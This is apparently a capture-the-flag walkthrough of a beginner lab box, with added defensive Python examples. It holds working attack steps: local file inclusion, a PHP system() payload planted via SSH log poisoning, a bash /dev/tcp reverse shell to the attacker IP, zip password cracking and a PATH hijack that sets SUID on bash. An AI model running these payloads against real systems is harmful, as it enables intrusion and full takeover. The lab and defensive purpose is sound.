Description

Difficulty: Easy

An easy box for beginners, but not too easy. Good Luck.

Hint: Enumerate Property.


nmap host discovery


kali    192.168.169.220
target  192.168.169.232

Target scan


Ports: 22, 80

Port 80


Nothing useful here.

Directory scan


tasks


blog-post


No leads; consulting another writeup, there are more directories:

gobuster dir -u http://192.168.169.232/blog-post/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak


Fuzzing

  • wfuzz

wfuzz -u http://192.168.169.232/blog-post/archives/randylogs.php?FUZZ=/etc/passwd -w /usr/share/seclists/Discovery/Web-Content/big.txt --hw 0


  • ffuf

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://192.168.169.232/blog-post/archives/randylogs.php?FUZZ=/etc/passwd -fs 0


Two methods; both recorded here purely for reference. The parameter turns out to be file:

http://192.168.169.232/blog-post/archives/randylogs.php?file=/etc/passwd
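The ?file= parameter found above is a textbook local file inclusion: whatever path is supplied is read and served. As an added example that is not part of the original writeup or the box's own PHP, here is a Python model of that unsafe pattern beside a hardened resolver that confines requests to an archive directory, refusing absolute paths, traversal and null bytes. ARCHIVE_DIR and ALLOWED_SUFFIXES are assumed values; the probe inputs are the ones used on the page.

```python
import os

# Assumed location of the archives page's log files; not taken from the box.
ARCHIVE_DIR = "/var/www/html/blog-post/archives"
ALLOWED_SUFFIXES = (".log", ".txt")


def vulnerable_resolve(file_param):
    """Unsafe pattern: the request value becomes the include path unchanged,
    so ?file=/etc/passwd or ?file=/var/log/auth.log is served as-is."""
    return file_param


def safe_resolve(file_param, base_dir=ARCHIVE_DIR, suffixes=ALLOWED_SUFFIXES):
    """Return an absolute path inside base_dir, or None if the request must be refused."""
    if not file_param or "\x00" in file_param:
        return None                      # empty value or null-byte truncation trick
    if os.path.isabs(file_param):
        return None                      # os.path.join would discard base_dir entirely
    candidate = os.path.normpath(os.path.join(base_dir, file_param))
    # normpath has collapsed any "../" segments; confinement is decided on the result,
    # not on the raw string, so encoded or doubled traversal sequences do not slip by.
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        return None                      # escaped the archive directory via traversal
    if not candidate.endswith(suffixes):
        return None                      # only log-type files are meant to be viewable
    return candidate


if __name__ == "__main__":
    for probe in ("/etc/passwd", "/var/log/auth.log", "../../../../etc/passwd", "2022/access.log"):
        print(f"{probe!r:32} unsafe -> {vulnerable_resolve(probe)!r:26} safe -> {safe_resolve(probe)!r}")
```

On a real deployment the check should be made on `os.path.realpath` of the candidate (so symlinks inside the archive directory cannot point outside it), and the PHP equivalent should additionally disable remote and wrapper includes; both are outside what this model shows.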


  • There was a hint earlier under the /tasks directory.


  • System files are readable, so first look at the auth.log mentioned earlier:

http://192.168.169.232/blog-post/archives/randylogs.php?file=/var/log/auth.log

  • It records all SSH login activity, so we can try supplying malicious PHP code as the username; that code will take a command from user input and execute it.

ssh '<?php system($_REQUEST['cmd']);?>'@192.168.169.232


Because of other problems the target IP changed to 192.168.169.233.

view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig


view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=whoami
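The poisoning step above leaves a clear footprint in auth.log before the inclusion ever fires: sshd writes the attempted login name verbatim into an "Invalid user" message. As an added example that is not part of the original writeup, the detector below scans sshd lines for usernames that carry PHP tags, code-execution calls, or simply do not look like a login name. The log excerpt is a constructed sample, not the box's real log.

```python
import re

# Constructed auth.log excerpt (not from the box). Lines 3-4 model what sshd
# writes when the username itself is a PHP payload, as in the step above.
SAMPLE_AUTH_LOG = """\
Dec  3 13:30:01 target sshd[1201]: Accepted password for randy from 192.168.169.220 port 51822 ssh2
Dec  3 13:30:15 target sshd[1210]: Failed password for invalid user admin from 192.168.169.220 port 51830 ssh2
Dec  3 13:30:33 target sshd[1215]: Invalid user <?php system($_REQUEST['cmd']);?> from 192.168.169.220 port 51844
Dec  3 13:30:40 target sshd[1215]: Failed password for invalid user <?php system($_REQUEST['cmd']);?> from 192.168.169.220 port 51844 ssh2
"""

# sshd logs the attempted name verbatim in both "Invalid user X from IP" and
# "Failed password for invalid user X from IP" messages.
INVALID_USER = re.compile(
    r"invalid user (?P<user>.*?) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})", re.IGNORECASE
)

# Things that never belong in a login name: PHP open tags and code-execution functions.
CODE_MARKERS = re.compile(
    r"<\?(?:php\b|=)|\b(?:system|passthru|shell_exec|exec|eval|assert)\s*\(", re.IGNORECASE
)

# Conservative shape of a legitimate Unix login name (POSIX portable characters).
VALID_NAME = re.compile(r"^[a-z_][a-z0-9_-]{0,31}\$?$")


def classify_username(user):
    """Return a short reason if the name looks like injected content, else None."""
    if CODE_MARKERS.search(user):
        return "php-code-in-username"
    if not VALID_NAME.match(user):
        return "malformed-username"
    return None


def find_poisoned_entries(log_text):
    """Return a list of (line_no, source_ip, username, reason) for suspicious invalid-user lines."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = INVALID_USER.search(line)
        if not m:
            continue
        reason = classify_username(m.group("user"))
        if reason:
            hits.append((n, m.group("ip"), m.group("user"), reason))
    return hits


if __name__ == "__main__":
    for n, ip, user, reason in find_poisoned_entries(SAMPLE_AUTH_LOG):
        print(f"line {n}: {reason} from {ip}: {user!r}")
```

Pointing this at a real /var/log/auth.log (or the journal's sshd output) and alerting on any hit gives a cheap signal for the technique; the "malformed-username" class is noisier than the PHP-tag class, but it also catches payloads in other languages and the enumeration that usually precedes them.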


Getting a shell

  • Start an nc listener
  • URL-encode the command:

bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'

bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'

  • Visit:

view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'


Privilege escalation


Extracting it directly asks for a password; download it and look at it locally.

  • Serve it with Python's HTTP server (nc could also be used to transfer the file):

python3 -m http.server 8000


  • Download it and crack the password with fcrackzip (install: apt-get install fcrackzip):

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt user_backup.zip


Extraction password: !randybaby


Switch user

ssh randy@192.168.169.233

Password: randylovesgoldfish1998


  • Checking its permissions shows it cannot be modified.

Borrowing someone else's method

  • Create a local cat file and write the shell into it:

echo 'chmod +s /bin/bash' > cat

chmod 777 cat

export PATH=/home/randy/tools:$PATH

./easysysinfo

/bin/bash -p
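Why the step above works, and what the SUID binary abused here should have done instead, as an added example that is not part of the original writeup or of easysysinfo itself: a Python demonstration that builds a throwaway directory containing a fake cat, shows that a lookup which trusts the caller's PATH resolves to it, and that a lookup pinned to a fixed system PATH does not. SAFE_PATH and the temporary directory are constructed for the demo.

```python
import os
import shutil
import subprocess
import tempfile

# A privileged helper must not inherit the caller's PATH; it pins its own.
# Assumed safe value for the demo, not taken from the box.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_command(name, path):
    """Locate `name` the way execvp (or sh -c) would, but against an explicit PATH string."""
    return shutil.which(name, path=path)


def run_pinned(name, args, timeout=5):
    """Run a system command by absolute path with a minimal environment, ignoring
    whatever PATH the caller exported. Returns stdout, or None if the command is absent."""
    exe = resolve_command(name, SAFE_PATH)
    if exe is None:
        return None
    proc = subprocess.run([exe, *args], capture_output=True, text=True,
                          env={"PATH": SAFE_PATH}, timeout=timeout)
    return proc.stdout


def demo_path_hijack():
    """Constructed scenario: a writable 'tools' dir with a fake cat is prepended to PATH,
    exactly the shape of `export PATH=/home/randy/tools:$PATH` above."""
    tools = tempfile.mkdtemp(prefix="tools-")
    try:
        fake_cat = os.path.join(tools, "cat")
        with open(fake_cat, "w") as f:
            f.write("#!/bin/sh\necho fake cat ran\n")   # stands in for the payload file
        os.chmod(fake_cat, 0o755)
        caller_path = tools + os.pathsep + SAFE_PATH    # attacker-controlled dir first
        return {
            "fake_cat": fake_cat,
            "trusting_caller": resolve_command("cat", caller_path),
            "pinned": resolve_command("cat", SAFE_PATH),
        }
    finally:
        shutil.rmtree(tools)


if __name__ == "__main__":
    r = demo_path_hijack()
    print("caller's PATH resolves cat to:", r["trusting_caller"])
    print("pinned PATH resolves cat to:  ", r["pinned"])
```

The same rule applies to a C helper that calls `system("cat ...")`: either invoke the tool by absolute path, or reset PATH to a known value (and drop the rest of the environment) before the call. As a detection aid, an unexpected directory at the front of PATH in a user's shell history or in the environment of a running SUID process is the observable side of this step.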


  • After using cat for privilege escalation, the cat command itself can no longer be used (the fake one shadows it while the tools directory is first in PATH).
